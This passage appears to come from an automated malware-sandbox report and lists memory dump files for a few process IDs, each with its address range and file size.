                                                                      Filesize

                                                                      5.2MB

                                                                    • memory/516-64-0x00007FFFC1F00000-0x00007FFFC1F0D000-memory.dmp

                                                                      Filesize

                                                                      52KB

                                                                    • memory/516-108-0x00007FFFBC6C0000-0x00007FFFBC83F000-memory.dmp

                                                                      Filesize

                                                                      1.5MB

                                                                    • memory/516-60-0x00007FFFBC6C0000-0x00007FFFBC83F000-memory.dmp

                                                                      Filesize

                                                                      1.5MB

                                                                    • memory/516-58-0x00007FFFC1030000-0x00007FFFC1054000-memory.dmp

                                                                      Filesize

                                                                      144KB

                                                                    • memory/516-56-0x00007FFFC2A90000-0x00007FFFC2AA9000-memory.dmp

                                                                      Filesize

                                                                      100KB

                                                                    • memory/516-54-0x00007FFFC1270000-0x00007FFFC129C000-memory.dmp

                                                                      Filesize

                                                                      176KB

                                                                    • memory/516-295-0x00007FFFC12A0000-0x00007FFFC12C5000-memory.dmp

                                                                      Filesize

                                                                      148KB

                                                                    • memory/516-300-0x00007FFFBC6C0000-0x00007FFFBC83F000-memory.dmp

                                                                      Filesize

                                                                      1.5MB

                                                                    • memory/516-294-0x00007FFFAE010000-0x00007FFFAE6D2000-memory.dmp

                                                                      Filesize

                                                                      6.8MB

                                                                    • memory/516-333-0x00007FFFAD9B0000-0x00007FFFADACA000-memory.dmp

                                                                      Filesize

                                                                      1.1MB

                                                                    • memory/516-334-0x00007FFFADAD0000-0x00007FFFAE003000-memory.dmp

                                                                      Filesize

                                                                      5.2MB

                                                                    • memory/516-332-0x00007FFFC1C80000-0x00007FFFC1C8D000-memory.dmp

                                                                      Filesize

                                                                      52KB

                                                                    • memory/516-331-0x00007FFFBD610000-0x00007FFFBD624000-memory.dmp

                                                                      Filesize

                                                                      80KB

                                                                    • memory/516-329-0x00007FFFBC5F0000-0x00007FFFBC6BE000-memory.dmp

                                                                      Filesize

                                                                      824KB

                                                                    • memory/516-328-0x00007FFFBCF70000-0x00007FFFBCFA3000-memory.dmp

                                                                      Filesize

                                                                      204KB

                                                                    • memory/516-327-0x00007FFFC1F00000-0x00007FFFC1F0D000-memory.dmp

                                                                      Filesize

                                                                      52KB

                                                                    • memory/516-326-0x00007FFFC1E80000-0x00007FFFC1E99000-memory.dmp

                                                                      Filesize

                                                                      100KB

                                                                    • memory/516-325-0x00007FFFBC6C0000-0x00007FFFBC83F000-memory.dmp

                                                                      Filesize

                                                                      1.5MB

                                                                    • memory/516-324-0x00007FFFC1030000-0x00007FFFC1054000-memory.dmp

                                                                      Filesize

                                                                      144KB

                                                                    • memory/516-323-0x00007FFFC2A90000-0x00007FFFC2AA9000-memory.dmp

                                                                      Filesize

                                                                      100KB

                                                                    • memory/516-322-0x00007FFFC1270000-0x00007FFFC129C000-memory.dmp

                                                                      Filesize

                                                                      176KB

                                                                    • memory/516-321-0x00007FFFC5170000-0x00007FFFC517F000-memory.dmp

                                                                      Filesize

                                                                      60KB

                                                                    • memory/4004-196-0x0000019480910000-0x0000019480918000-memory.dmp

                                                                      Filesize

                                                                      32KB

                                                                    • memory/4932-88-0x000002B4BD480000-0x000002B4BD4A2000-memory.dmp

                                                                      Filesize

                                                                      136KB